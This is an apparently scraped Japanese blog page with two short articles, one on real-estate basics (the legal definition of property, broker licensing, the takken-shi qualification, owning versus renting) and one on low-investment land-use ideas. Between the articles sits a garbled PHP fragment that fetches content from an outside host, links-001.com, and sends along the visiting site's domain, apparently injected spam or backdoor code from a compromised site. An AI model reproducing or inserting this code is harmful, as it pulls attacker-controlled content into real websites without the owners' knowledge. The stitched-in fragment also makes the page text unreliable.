不動産に関する知識について述べます

不動産

不動産に関する知識について述べます

不動産とは、民法の規定により土地と建物があります。
またそれに付属する定着物も同法で規定しています。
不動産を扱う業者を一般的に町の不動産屋と言っています。
不動産を扱うためには、宅地建物業法により免許制になっています。
免許には都道府県知事と国土交通大臣の2種類あります。
不動産屋は宅地、建物の売買や媒介、代理やアパートの賃貸が出来る事になっています。
最近では新築住宅より購入型のマンションの方が話題になっています。
一般的に購入型の値段は安価でも2000万円前後が相場になっています。
もちろん賃貸型のマンションもあります。
比較的大きな違いは固定資産税の支払いが購入型にはあり、賃貸型は支払いがないのです。
不動産に関する資格も多数あります。
一般的な資格は宅建士です。
不動産屋さんに最低1人は配置が義務づけられています。
宅建士の他にも国家資格のマンション管理士や民間資格のマンション管理員等があります。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

ほとんど投資が必要ない土地活用術もある

長期的な安定収入を得るために、自分が持っている不動産を活用する人は多くなっています。
この土地活用にはいろいろな方法があり、大概は本建物を建築して賃貸収入で収益を上げる方法を選択する人が多いでしょう。
しかし、この土地活用の方法はそれだけではないのですね。
たとえば、駐車場やバイクパーキング、あるいは資材置き場などの貸地にすることもあります。
さらに最近ではコンテナハウス、ようするに倉庫ですね、これを提供する人も増えています。
こうした目的で土地を貸す場合、簡易な建物などは容易に撤去ができますからけっこう人気なのですね。
それから新築分譲マンションを販売するときに利用されるモデルルームというものがありますよね。
あれなども土地を貸すだけの活用術になります。
この現代ではこうした新築分譲マンションはあちこちでできていますから、モデルルームを置く土地はかなり需要があります。
また、投資がほとんど必要ないという事も大きなメリットになります。
必要だと言う人がいれば、すぐにでも始められるのですから、これはかなりおすすめの土地活用術だと言えますね。

最新記事